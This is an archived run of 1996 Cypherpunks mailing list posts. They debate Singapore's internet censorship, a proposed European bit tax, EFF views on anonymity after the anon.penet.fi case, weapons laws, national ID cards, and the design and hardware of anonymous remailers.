> > idealogy and perspection on how things to be done to Singapore. Singapore 
> > maybe young but there are certain culture too.
> > 
> > Most importantly, the move to censor certain WWW site actually comes as a 
> > relieve to many people, especially parents who worried about the bad 
> > influence of it. We can go into the same discussion about whose 
> > responsibilty it is but before you do that, please bear in mind that this 
> > is Singapore.
> 
> America is much less different from Singapore in that respect than
> you might think.

Actually, it is. I've been living in South-East Asia for almost one
decade now, and I can tell you that most citizen are more socially
conservative than their governments. A few years ago, the Singapore
government had to backtrack from a very timid relaxation of rules on
soft-porn movies due to the negative reactions from the public. In
Singapore, the problem is compounded by the need of preserving good 
relationships with the even more conservative Malay minority, whose stances 
have strong backing by the two large neighbours, Malaysia and Indonesia
(the case I mentioned had prompted accusations to the government, by 
members of the opposition Workers Party, of planning the "corruption of 
the Islamic youth").

Of course, one may argue that the racial, social and religious relations
are better handled the American way. That, however, is a controversial
issue, and adopting confrontational cowboy attitudes is not going to make
the social evolution any faster. Besides, I don't think that the Singapore
government can really believe to be able of blocking access to anything on
the net: a while ago I had the occasion of talking with some medium rank
officers, and they sounded fully aware of the Internet technology and its
implications - and willing to take the plunge. IMHO, the present measures
represent more a gesture of appeasement to concerned social conservatives,
not differently from the CDA in the US, than an attempt to control the
flow of information.

Enzo




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brett Eitland <eitland@blue.weeg.uiowa.edu>
Date: Tue, 3 Sep 1996 03:44:14 +0800
To: cypherpunks@toad.com
Subject: desubscribe
Message-ID: <322B2CF6.ECD@blue.weeg.uiowa.edu>
MIME-Version: 1.0
Content-Type: text/plain


desubscribe




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Enzo Michelangeli <enzo@ima.com>
Date: Mon, 2 Sep 1996 14:16:18 +0800
To: cypherpunks@toad.com
Subject: Re: DON'T Nuke Singapore Back into the Stone Age
In-Reply-To: <Pine.LNX.3.95.960901230817.1485A-100000@gak>
Message-ID: <Pine.LNX.3.91.960902115112.10553C-100000@ima.net>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 1 Sep 1996, Mark M. wrote:

> I have every right as a citizen of country A to tell politicians of country B
> what they should or shouldn't do.  This isn't about American Ideology; it's
> about natural rights.

There are no "natural" rights: a right is the contractual flipside of the
an obligation, and is only meaningful in the context of a society - which 
is a thing that evolves continuously.

Enzo
(more with Hume and Hayek than with Descartes and Rousseau).




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Blake Wehlage <jwilk@iglou.com>
Date: Tue, 3 Sep 1996 02:44:22 +0800
To: cypherpunks@toad.com
Subject: Re: free speech online
Message-ID: <m0uxbWj-000bOwC@relay.iglou.com>
MIME-Version: 1.0
Content-Type: text/plain


At 02:47 AM 9/2/96 EDT, patrick b cummings wrote:
>I agree that their should be free speech on the net.  Someone should
>start a petition and get as many people to sign it as possible.
>

Patrick.... i have a deal for ya.... you don't write this list for a week?
or at least keep the spams to a minimum. Post the hacker requests to a
hacker-mailing list (what a concept). Have a nice day!
==========================================
   Blake Wehlage <jwilk@iglou.com> 
    World's Youngest Cypherpunk
2400bps is the net's old people drivers





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: qut@netcom.com (Dave Harman OBC)
Date: Tue, 3 Sep 1996 05:27:35 +0800
Subject: Re: Sharp Knives
In-Reply-To: <ae506466010210047a73@[207.167.93.63]>
Message-ID: <199609021911.MAA08644@netcom21.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


! At 1:38 PM 9/2/96, Dave Harman OBC wrote:
! 
! >In California, it's a felony to merely *own* a Ninja star.  It's a
! >felony to carry a *concealed* knife, but carrying it openly in a
! >holster is legal.  It's a felony for most people to carry a
! >concealed loaded handgun on the street only on a *second* offense.
! >It'a a felony to merely *own* a switchblade, brass knuckles, etc.
! >Do our weapons laws sound strange?  Are many of our weapons laws
! >stricter than countries like Sweden?  Yes!
! 
! Most laws about knives, dirks, daggers, brass knuckles, saps, etc. were
! devised to control the coloreds, who could not afford the weapons of choice
! of whites and other gentlemen.
! 
! Hence, a colored who gets picked up on some charge, or detained, can be
! jailed on a felony charge for having a pocketknife, or a sap, or brass
! knucks. Coloreds from Asia can be jailed for having the martial arts sorts
! of weapons.
! 
! A white gets a misdemeanor charge for carrying a gun.

Of course, whites never commit other crimes, are never on the 
proscribed categories, and people of colour never carry guns or are
never free of being classified as being in the proscribed categories.  You
sound like Skippy making fun of the McClatchy newspapers.

! (This analysis is not original with me. The gun magazines have noted the
! racist origins of misdemeanor/felony dichotomies for many years. One
! article I read a few years ago traced the precise times at which these laws
! came into being...mostly the times in various states corresponded with
! periods of high immigration of coloreds to major cities.)
! 
! Here in California there's a bill pending in the legislature which would
! decriminalize the carrying of a pocketknife that can be opened with one
! hand (a la the Spyderco, Benchmade, Buck, Cold Steel, etc., knives with
! thumb holes or studs). Even though such knives are openly sold in every
! sporting goods store I have ever been in, and are carrried by a truly large
! fraction of the population, such knives are currently classified as
! "switchblades" and can be prosecuted as a felony. A good way to selectively

What?  Are you talking about lockbacks?  An actual switchblade is a
felony to *possess* in California.

! harasss someone. Interestingly, it was the District Attorneys lobbying

I'm familiar with the anti-racist pandering of the gun rights majority.
The weapons mentioned above were banned later this century in 
California, ostensibly to protect minors.  There has always been cheap
firearms available to poor people in America, I'm not aware that only
coloured people can be poor!  It's been a step by step process to take
away rights, it's been entirely irrelevent what the laws were supposedly
for.  It is not believable that all whites are rich or that poor whites
in prison are treated with greater respect than rich people of colour or
poor people of colour.  There's been *both* racist and anti-racist
elements to the progress of unjust laws, the original intent of the law
itself is forgotten if the current law only respects people of capital.
</disjointed\ paragraph=stop/>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Tue, 3 Sep 1996 09:31:01 +0800
To: cypherpunks@toad.com
Subject: "Bit Tax" article in EET
Message-ID: <199609022015.NAA09677@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


August 26, 1996, Electronics Engineering Times, Page 4

"Europe wary of bit tax"

By Peter Clarke

Maastrict, Netherlands

Since it surfaced in a report prepared for the European Commission earlier 
this year (see April 29, page 1) the idea of a "bit tax" on data 
communications has received a mixed response in Europe.  Feedback has ranged 
from calls for adoption and implementation from within the Belgian 
government, to a qualified rejection by one vice president of the European 
Commission (EC), to disjust and disbelief amonst individual Interenet users, 
particularly in Italy.

The bit tax idea, only a very minor part of an interim report, has received 
a great deal of publicity from private individuals, who seem to be the most 
upset, fearing state interference as an attempt to tax freedom of speech.  
Luc Soete, director of the Maastrict Economics Research Institute on 
Innovation and Technology, has been heavily flamed via e-mail since the 
report's publication.  As chairman of the so-called High Level Experts Group 
(HLEG) which authorited the report, it was he who included just one clause 
in about 100 pages of text, calling for an investigation of the taxing of 
data transmission over networks, and particularly over the internet.

[JB:  I can't resist adding a comment here.  One of the most threatening 
aspects of this "bit tax" idea (even far more important than the value of 
the money paid) is the fact that it would make all ISP's and Internet users 
automatically subject to "tax evasion" charges which would just be a 
smokescreen for content investigation, and would automatically "justify" 
wiretaps where content-based investigation would be impossible.  It is very 
likely that threatening an ISP with such charges would cause him to become 
more cooperative, and the difficulty in calculating and verifying the 
accuracy of the taxes paid would make everyone an inadvertent criminal, 
which would give the government enormous leverage it wouldn't otherwise 
have.  The way I see it, anyone who values freedom who would otherwise 
support a bit-tax-type proposal should run into a brick wall with this 
problem, and join the opposition to it right here.]

Speaking at a conference on telecommuting, the Belgian Minister for 
Telecommunications, Elio Di Ruppo, came out as a supporter of the bit tax.  
But the Flemish government, which is responsible for half of Belgium, claims 
a bit tax would undermine its efforts in promoting information technology 
within its territory.

The report was prepared for DG-V, the department of the EC responsible for 
social affairs, but Martin Bangemann, the EC vice president who heads up 
DG-XIII and is responsible for information technology and 
telecommunications, has expressed concern over the impact of a bit tax.  
Issues include economic growth and roll out of next-generation information 
and communications technologies and how a bit tax could be implemented.  
The EC's official position on the bit tax is that it has no position.  "This 
is only an interim report at the moment," said a spokesman for the DG-V.  
"The bit tax idea may not even be present in the final report."

Not Possible?

"The big problem is that it's a nice idea, but implementation may not be 
possible at the European level," the spokesman continued.  It may have to be 
set at the world level.  At the moment, we are waiting for the final report."

Officials responses to the interim report, from government and industry 
bodies, have been generally favorable but often don't mention the bit tax, 
Soete said.  "The bit tax responses have been much more individual.  It just 
goes to show that people don't read reports, but they do read newspapers."

Soete continued: "E-mail responses have been very offensive, very negative." 
 Reluctant to give examples, Soete admitted that many e-mail messages had 
attacked him personally but that the gist was "keep your hands off the 
Internet."

Those responses, as well as more cogent arguments put forward, have prompted 
Soete to publish a second paper, titled: "The bit tax:  the case for further 
research."  In this, Soete has recast the bit tax as a replacement for the 
value-added tax (VAT) on information-technology goods and services, rather 
than as an additional tax.  "There was an issue of double taxation there, 
which it is hard to justify," he said.

VAT is a European-wide system of taxation on consumption roughly equivalent 
to the US sales-tax system:  It is typically set at 17.5 percent of the 
untaxed value.   Soete argued that VAT is heavily based on ideas of material 
inputs at different states through a chain of manufacture and is not 
well-suited to "intangible" services.

He pointed out that a telephone call is currently priced and taxed in 
relation to the distance and time.  Instead, Soete proposes the bit or 
byte--rather than the second--as the fundamental unit of measure.  Taxation 
on that basis might save small-scale users money while increasing the tax 
burden on large-scale users.

"This is a new system of communications, and the assumption that we should 
be able to use it without any taxation is ridiculous," Soete said.

As planned, the HLEG will rewrite its report in light of responses and 
further research by the end of 1996 before submitting it to DG-V, which is 
then expected to call for some of the particular recommendations to be 
investigated in 1997.

[end of article]










Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Gilmore <gnu@toad.com>
Date: Tue, 3 Sep 1996 06:56:10 +0800
To: gnu@toad.com
Subject: Re: Los Angeles Times article on Helsingius and anon.penet.fi
In-Reply-To: <19960901220323595.AAA208@Esther.edventure.com>
Message-ID: <199609022031.NAA28702@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


> >>Is this _really_ the EFF policy on anonymopus remailers??

EFF does not have an agreed-upon position on anonymity (or
anonymopusity).  Each of us speaks as individuals on the topic.

Several EFF board members have experienced problems around anonymity.
On the Well, there was an experiment in anonymity which ended poorly.
I wasn't there so it's hard to critique it in hindsight.  But it 
certainly convinced ex-EFF-board-member Stewart Brand of the dangers of
anonymity.

Personally I'm in favor of anonymity.  I've researched the Supreme
Court cases that support it, and spoken on panels in favor of it.  I
frequently point out that postal mail and telephones are anonymous,
and the world has not disintegrated.  Part of what started the
cypherpunks in the first place was the anonymous remailer game, in
which some players tried to figure out who was passing notes to who,
while the others tried to conduct transactions anonymously under their
noses.  I was arrested at an airport a few weeks ago, and kept in
custody for 2-1/2 hours, for refusing to identify myself (and failing
to turn on my laptop on command!).  If the ACLU is interested, I'd
love to make a test case out of it.  I think in America we have -- and
should work to keep -- the right to travel within our borders without
identifying ourselves or producing any kind of government "papers".

But I sure can tell you I got mad when someone "anonymously" punctured
the tires of the car I was driving, for many weeks in a row.  The
hardest part was that I had no way to figure out WHY they were doing
it -- there was no way to communicate with them.  (Perhaps I should've
painted a message on the tires...)

If you think the problem with anonymity is restricted to physical
damage, think again; there are ways to do non-physical damage.
"Outing" people who have secrets is one way; confronting people with
ideas that they are unprepared to deal with is another.  Not to
mention theft of intellectual property, fraud, and other economic
damage, that anonymity makes it harder to deter or punish.

Like free speech and democracy, anonymity comes with its drawbacks;
it's just better than the alternatives.  Personally I think each
person should have the right to choose how much to identify themselves
and how much to be anonymous, in each situation.  Without losing
their civil rights (like the right to travel, or to speak or publish).

	John Gilmore

PS: I would counsel against the kind of false anonymity provided by
the Finnish server, though.  Providing information under the promise
that it will "never be revealed or misused" is a lot more dangerous
than never providing it at all.  E.g. "Anonymous cash" that is really
based on dossiers or account-numbers isn't anonymous at all.  Even
physical cash is getting easier to trace; the British government has
been tracking money by serial numbers for years, with custom machines
in the banks, to de-anonymize Irish freedom-fighters (oops, I mean
terrorists).  Anonymity is another area, like privacy, where changes
from technology can make big social differences.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Tue, 3 Sep 1996 04:16:26 +0800
To: cypherpunks@toad.com
Subject: More child pornography nonsense
Message-ID: <01I906YVP1M89JDI20@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain



   
>   webslingerZ
>     _________________________________________________________________
>                 POLICE SEARCH INTERNET FOR CHILD SEX ABUSERS
>   __________________________________________________________________________
                                       
>      Copyright &copy 1996 Nando.net
>      Copyright &copy 1996 Reuter Information Service
      
>   STOCKHOLM, Sweden (Aug 31, 1996 00:11 a.m. EDT) - Police across Europe
>   widened their net Friday to track down a pedophile network which is
>   spreading increasingly to the hard-to-detect Internet, while at an
>   international conference, Southeast Asia was cast as a major
>   destination for child sex tourists.
   
>   At the World Congress Against Commercial Sexual Exploitation of
>   Children, which has attracted over 1,000 delegates to Stockholm from
>   130 countries, campaigners outlined measures to crack down on
>   pedophiles' use of the Internet.
   
>   Norway's ombudsman for children, Trond Waage, said to date there was
>   very little action that could be taken to stop the distribution of
>   child pornography on the Internet.
   
>   But he said the establishment last week of an international body to
>   monitor child pornography on the net, a task taken on by the Norwegian
>   branch of Save the Children, was firm action against pedophiles using
>   the net.
   
>   "This is a kind of a cybercop," Waage told reporters.
   
>   "We need some visible cops on the net. If you undertake these kinds of
>   criminal activities someone will monitor you."
   
>   Save the Children will try to monitor any child pornography on the
>   Internet and is encouraging other net surfers to pass on information
>   that will be handed to the police.

	Want to bet how fast they'll be mail-bombed? Cops on the net are _not_
popular, no matter what they're doing. This fact is especially true when
there's no actual harm taking place (unlike, say, spamming) - the harm has
_already_ taken place by the time the material is on the Internet. Should we
ban films with violence because they _might_ be snuff films?
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Tue, 3 Sep 1996 04:14:52 +0800
To: cypherpunks@toad.com
Subject: Modem tax again?
Message-ID: <01I9075ZGV3O9JDI20@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


	As I recall, the alleged "subsidy" consists of lack of payments so
rural areas can have subsidized phone service - thus making their costs borne
by everyone else.
	-Allen

>     _________________________________________________________________
>   Avis
>     _________________________________________________________________
>                INTERNET IS HURTING PHONE NETWORKS, STUDY SAYS
>   __________________________________________________________________________
>      Copyright &copy 1996 Nando.net
>      Copyright &copy 1996 San Francisco Examiner
      
>   SAN FRANCISCO (Aug 27, 1996 3:11 p.m. EDT) -- Hoping to reduce or end
>   a subsidy that has kept down the cost of on-line service, local phone
>   companies here have presented the Federal Communications Commission
>   with studies arguing that Internet users are overtaxing phone networks
>   and ought to pay more for monthly service.
   
>   The studies, one of which was published on the Internet, argue that a
>   13-year-old subsidy lets Internet service providers (ISPs) pay a
>   fraction of what a long distance company pays to get a phone line,
>   even though Internet calls may use more phone system capacity than
>   voice traffic.
   
[...]

>   For their part, ISPs are alarmed at the remote possibility that the
>   FCC might let phone companies raise their monthly costs from the
>   current monthly average of $30 to anything approaching the $600 that
>   some long distance carriers pay for a phone line.
   
>   "If we had to pay anything like long distance access charges, it would
>   put all the ISPs out of business," said Ronald Plesser, the
>   Washington, D.C., attorney who represents the Commercial Internet
>   Exchange, an ISP trade group.
   
>   FCC staff attorney Kevin Werbach said the subsidy began in 1983, when
>   the five-member federal commission created a special rate to encourage
>   the growth of on-line services, voicemail companies and other emerging
>   industries that offered enhanced electronic services over phone lines.
   
>   In 1987, the FCC considered ending the subsidy but backed down after
>   public protest over what came to be characterized as the "modem tax."
>   Given the growth in on-line usage, ISPs assume any talk of ending the
>   subsidy would create a bigger backlash today.
   
>   "There are a minimum of 20 million and perhaps as many as 40 million
>   on-line and Internet users and many of them are registered voters,"
>   said William Schrader, president of PSI Net, an ISP in Herndon, Va.
   
>   Schrader said when he visited several FCC members recently, he
>   suggested that many of those users would be happy to send a letter of
>   protest to FCC Chairman Reed Hundt.
   
[...]

>    Copyright &copy 1996 Nando.net




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark M." <markm@voicenet.com>
Date: Tue, 3 Sep 1996 04:28:55 +0800
To: cypherpunks@toad.com
Subject: Re: Cypherpunk Mailboxes?
In-Reply-To: <199609021534.KAA26279@mailhub.amaranth.com>
Message-ID: <Pine.LNX.3.95.960902133457.456A-100000@gak>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Mon, 2 Sep 1996, William H. Geiger III wrote:

> Hi,
> 
> I have a thought for addressing the anon. problem.
> 
> We could create a network of anonymous remailers with mailboxes. All
> messages in the mailboxes are stored encrypted. No information about the
> users are keep. Users would be be given x K of mailbox space.
> 
> We could use PGP keys for encrypting the messages. Each user would have his
> own key pair for his anonymous mailbox. Any plain text messages received to
> the server would be encrypted on recept.
> 
> Let the government's subpoena away. :)
> 
> "Sorry we don't have user addresses, no I can't decrypt those messages
> Senator." <BEG>
> 
> What do you think?

The only problem is there has to be someway for users to retrieve their mail.
The current nym server approach is to use an encrypted reply block to send a
user new mail.  This way the nym server doesn't know who the user is.  If users
have to actively retrieve their mail, then the feds could install a packet
sniffer on the remailers net link to find out the real email address of an
anonymous user.

- -- Mark

PGP encrypted mail prefered.
Key fingerprint = d61734f2800486ae6f79bfeb70f95348
http://www.voicenet.com/~markm/

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3
Charset: noconv

iQEVAwUBMiscESzIPc7jvyFpAQGQ8ggAoHoGwwLI/8WI3XEBvA/Yo/lOPu1bQGYZ
+m/jYzZjlF/YcS54J+H+L+xRo9WcOJkm7LLetTRZM3N/vG71M01vLcoOnfciRjFz
AhLj2V5DGEcyQE0GMBXOxgxKvnzMVkFJh6ZWFalIM0DedncdX541W3j+almPb7Yr
YyT+On5mqbPd0U5rJgv2CfE5CFlAE7XyO0KteH5aONK3f6TxzGH4cGG8wSZaBiu4
jP55nTl8VdtMH7MBDqOFkAH7IOboDZzjDglbuFHFk/nhtKfYIzg4c/ck5VCZ1vs8
xIqaPIMzpQF/smfKS2upyhZB1fb3G101lUJmjoVkEATQhwMzLBhY1Q==
=QbyB
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Dave Banisar" <banisar@epic.org>
Date: Tue, 3 Sep 1996 04:14:51 +0800
To: "Cypherpunks List" <cypherpunks@toad.com>
Subject: National ID Card Web Pages
Message-ID: <n1370450087.79840@epic.org>
MIME-Version: 1.0
Content-Type: text/plain



         EXTENSIVE NATIONAL ID CARD WEB SITE IS NOW ON LINE


The London-based human rights watchdog Privacy International (PI)
has just opened an extensive web page on National ID cards. The
initiative comes in the wake of pending efforts in the United
States, Canada and United Kingdom to implement national ID card
systems.

The page contains a 7,000 word FAQ (Frequently Asked Questions) on
all aspects of ID cards and their implications. Also included in the
PI documents is a paper describing successful campaigns opposing to
ID cards in Australia and other countries.  The page also has links
to numerous other sites and documents.

PI Director Simon Davies said he hoped the page would help promote
debate about the cards, "ID cards are often introduced without
serious discussion or consultation. The implications are profound,
and countries planning to introduce them should proceed with
caution."

"The existence of a card challenges important precepts of individual
rights and privacy. At a symbolic and a functional level, ID cards
are often an unnecessary and potentially dangerous white elephant.
They are promoted by way of fear-mongering and false patriotism, and
are implemented with scant regard for serious investigation of the
consequences." he said.

The URL is :

   http://www.privacy.org/pi/activities/idcard/

PI has also set up an auto response function for the FAQ document.
Its address is: idcardfaq@mail.privacy.org

Privacy International is an international human rights group
concerned with privacy and surveillance issues. It is based in
London, UK. For further information contact the Privacy
International Washington Office at +1.202.544.9240 or email
pi@privacy.org. PI's web page is available at:
http://www.privacy.org/pi/





_________________________________________________________________________
Subject: National ID Card Web Pages
_________________________________________________________________________
David Banisar (Banisar@privacy.org)     *  202-544-9240 (tel)
Privacy International Washington Office *  202-547-5482 (fax)
666 Pennsylvania Ave, SE, Suite 301     *  HTTP://www.privacy.org/pi/
Washington, DC 20003                   




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Tue, 3 Sep 1996 07:02:59 +0800
To: cypherpunks@toad.com
Subject: Re: Silenced Machine Guns Are Safer Than TWA
Message-ID: <ae50996901021004ef47@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 6:37 PM 9/2/96, Dave Harman OBC wrote:
>tcmay@got.net (Skippy) wrote:
>
>! At 4:33 AM 9/2/96, qut@netcom.com (Net God) wrote:
>!
>! >Contrary to popular fiction, ALL firearms have been permanently
>! >registered since the 1968 Gun Control Act.  The media monopoly lies when
>! >they say the contrary.
>!
>! Nope. Gun sales between individuals without any paperwork were fully legal
>! in some places until recently (and may still be fully legal...I can only
>! speak of California).
>
>So?  I was talking about NEW sales of firearms from license holders.  Let's
>consider improving the future rather than preserving the past, shall
>we?

My apologies! I assumed when you wrote "since the 1968 Gun Control Act" you
meant since the 1968 Gun Control Act. I did not realize that you translate
"since the 1968 Gun Control Act" into "NEW sales of of firearms."

Sorry. I'll consult my qut-dictionary more often.

--Tim May

We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Asgaard <asgaard@Cor.sos.sll.se>
Date: Mon, 2 Sep 1996 22:26:51 +0800
To: cypherpunks@toad.com
Subject: RE: Sharp knives
In-Reply-To: <v03007803ae4fcff247f2@[17.219.103.198]>
Message-ID: <Pine.HPP.3.91.960902134028.4162B-100000@cor.sos.sll.se>
MIME-Version: 1.0
Content-Type: text/plain


 "James A. Donald" <jamesd@echeque.com>, writes:
 >I heard on talk.politics.guns somebody say that in Sweden they
 >had banned knives with a sharp point at the end, and were going
 >to ban sharp knives altogether.  I think he was just engaging in
 >hyperbole, that he really meant that gun control in Sweden was
 >unreasonably strict, but on reflection I am not sure.

There is a law in Sweden, some 5 years old, against carrying
'dangerous devices' (hunting knives, Ninja stars etc) in 'public
places' (unless you are a carpenter, electrician or some such
going about your business). It's okay to carry a knife when
going fishing/hunting or sitting on your terrace carving totem poles.
It's only a misdemeanour and might be punished with a fine,
but usually the cops just use the law to disarmour street gangs
on the spot. The effects of the law are dubious. Knives have come
into fashion among teenagers after this legislation (but not as
a consequence of it, I think).

Asgaard




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Tim O'Reilly" <tim@ora.com>
Date: Tue, 3 Sep 1996 07:17:36 +0800
To: John Gilmore <apache@quux.apana.org.au>
Subject: Re: Los Angeles Times article on Helsingius and anon.penet.fi
In-Reply-To: <gnu@toad.com>
Message-ID: <199609022105.OAA03983@isla.west.ora.com>
MIME-Version: 1.0
Content-Type: text/plain


John,

Your statements seem like a position I could sign up to
as an official EFF position...


-- 
Tim O'Reilly @ O'Reilly & Associates, Inc.  Publishers of Nutshell Handbooks
103 Morris Street, Sebastopol, CA 95472   
707-829-0515 ext 266, Fax 707-829-0104, tim@ora.com 
Check out http://www.ora.com, http://website.ora.com, http://www.songline.com 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Stanton McCandlish <mech@eff.org>
Date: Tue, 3 Sep 1996 11:28:35 +0800
To: edyson@edventure.com (Esther Dyson)
Subject: Re: Los Angeles Times article on Helsingius and anon.penet.fi
In-Reply-To: <19960901220323595.AAA208@Esther.edventure.com>
Message-ID: <199609022106.OAA15793@eff.org>
MIME-Version: 1.0
Content-Type: text/plain


> Therefore I would
> favor allowing anonymity -- with some form of traceability only under terms
> considerably stronger than what are generally required for a wiretap.
[...]
> Please note that this is not the same as the right to *private*
> conversations and the use of encryption; this is the issue of being
> accountable for what you publish in public.  

A problem here is that the *same* services and capabilities that permit 
anonymous speech in private permit anonymous speech in public. 
Compromising the latter compromises the former as well.

> Anyone who seriously needs anonymity because of a repressive government is
> likely to use a foreign (outside whatever jurisdiction he fears) server, so
> that this is not a matter of "local" laws.  The tracer would have to pass
> through what I hope would be tighter hoops than we have now.  

Unless chaining of remailers is made manadatory and automatic, this is 
unlikely to work. CoS had little difficulty getting anon.penet.fi's logs, 
and getting a preliminary ruling against online anonymity from the 
Finnish courts.

You have to have an anonymizing system that crosses a dozen or so 
national boundaries to make such an attack infeasible for most large 
organizations.  You'd need a system that crossed 50 or more widely 
disparate jurisdictions to make it infeasible to large intelligence or 
law enforcement agencies, and even then you'd have to NOT have broad 
international agreements, such as you'd called for or it would be trivial 
to force all the remailers in the chain to cough up personally 
identifiable information.

> My assumption is that there will be a wide variety of Net communities with
> different rules/regulations/attitudes towards anonymity that would apply ex

This is already true.

> some kind of international sanctions; I think that's appropriate.  

That's what bugs me - if there are some kind of sanctions coming from a 
governmental body (I may be misinterpreting you here), that's probably 
enough to kill private and well as public anonymity on the Net.

Incidentally, if something does happen from a governmental direction to 
kill online anonymity, it will probably be readily broadenable to all 
other media.

--
<HTML><A HREF="http://www.eff.org/~mech/">    Stanton McCandlish
</A><HR><A HREF="mailto:mech@eff.org">        mech@eff.org
</A><P><A HREF="http://www.eff.org/">         Electronic Frontier Foundation
</A><P>        Online Activist    </HTML>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "P. J. Ponder" <ponder@freenet.tlh.fl.us>
Date: Tue, 3 Sep 1996 04:53:50 +0800
To: cypherpunks@toad.com
Subject: new-thinking mailing list tidbit; Singapore slings
Message-ID: <Pine.OSF.3.91.960902132848.8336A-100000@fn3.freenet.tlh.fl.us>
MIME-Version: 1.0
Content-Type: text/plain


keywords: thought police; mind control; Stone Age; cluelessness;
          Island nation; why are remailers bad?

the mailing list 'new-thinking' has an interesting piece in the 
current issue, speaking of on-line communities of interest.
the archive is at:

********************************************************************
For a hyperlinked version of this piece, please go to:
http://www.nua.ie/NewThinking/Archives/newthinking011/index.html
For New thinking archives, please go to:
http://www.nua.ie/NewThinking/Archives/index.html
********************************************************************

+++++

sounds like the Singapore brainwashing is working pretty well if their
educated people are opposed to even a discussion of whether free speech
is a good thing or not.  Yikes.  It isn't a cultural thing, pinhead.

Get life, government goon.  Free speech is the right to say things
others - even a _majority_ or even the government - may find unpopular. 
And you can tell your fascist dictator I said so.
--
P.J. Ponder

OBCrypto: 
for a keyed-SHA signature system, is there an advantage to pre-pending 
the keystring as opposed to appending it?  I think I read something 
about this in one of Hugo Kracyk's (sp) papers about a keyed-MD5 system, 
but now I can't find it.  If I recall correctly, he explained why it 
was better to put the key part in the beginning, instead of the end....
Thanks for any help.  

[Anti-Dyson and anti-EFF rant left off for now. waiting for more 
responses from EFF et al.  Was nice to get a reply from Esther Dyson.
Didn't change my mind about anonymity being a good thing, though.  It 
will be interesting to see what Julf gets back from his survey of why 
people are opposed or in favor of anonymity.]  [See the web page listed 
in the press release from penet.]

I looked at the FTP, Inc. software site referenced here a few days ago
for the email package that integrates PGP. Pretty hefty package to ftp
over a 28.8 dialup.  The write-up on the web page looked good - I'll ftp
it at the office over the T1 if I can and see what it does.  I assume
it blows up after the 30 days (or whatever the trial period is)? 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@cypherpunks.ca (John Anonymous MacDonald)
Date: Tue, 3 Sep 1996 07:44:09 +0800
To: cypherpunks@toad.com
Subject: Re: strengthening remailer protocols
In-Reply-To: <9608231805.AA01523@clare.risley.aeat.co.uk>
Message-ID: <199609022125.OAA17259@abraham.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


I don't really see the use of this complicated scheme.  The main
problem seems to be that if M floods remailer R with messages to B,
and A sends a message to C through R, then it will be clear to M that
A's message was destined for C.

Rather than divert messages, then, I propose that for each input
message there is a 10% chance that a piece of cover traffic is
generated.  Thus, if M sends 50 messages through R and sees 6 outgoing
messages going to remailers C, D, and D, he will now know which
messages correspond to the message that A send through.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ghio@netcom.com (Matthew Ghio)
Date: Tue, 3 Sep 1996 11:02:45 +0800
To: cypherpunks@toad.com
Subject: Re: anon.penet.fi: URGENT REQUEST
In-Reply-To: <199609011922.OAA31806@manifold.algebra.com>
Message-ID: <199609022129.OAA02339@myriad>
MIME-Version: 1.0
Content-Type: text/plain


Someone wrote:
: ! > I remember the load on anon.penet.fi was something like 7500 messages
: ! > daily. As for connection, you will need 64kbps line or even less in case
: ! > you compress the messages. The machine could be either an older Sun Sparc
: ! > or a PC running free Unix (Linux/FreeBSD/...)

anon.penet.fi actually used a 486/66 running FreeBSD.


Dave Harman OBC (qut@netcom.com) wrote:
: ! I suggest the following configuration: a IBM 486 PC with 16MB of
: ! RAM and 28.8 modem, running qmail instead of sendmail and Linux,
:
: How is qmail better than sendmail?  The default BSD sendmail since 8.00+
: has automated ident requests built in.  It can easily be compiled without
: that default option, for greater efficiency.

Disable reverse-DNS too...

: ! on a dedicated 28.8 PPP line. The cheapest used VGA display from
: ! the nearby waste dump will work just fine.
:
: Hell, any monitor should work!

You don't need a monitor at all.  Since we're assuming that the remailer
is a dedicated machine, and you'll do your real work on another computer,
just plug a null modem cable into the serial ports and use a terminal
program on your other computer.

: ! Estimated cost: $700-1000 for the system, $50-100/month for the
: ! connection, and 3 hours per day to deal with mailbombing from

$500 tops.  8MB is probably okay, 16 might improve resistance to mailbombs
a bit tho.  You can get 486 motherboards for under $100 nowadays.
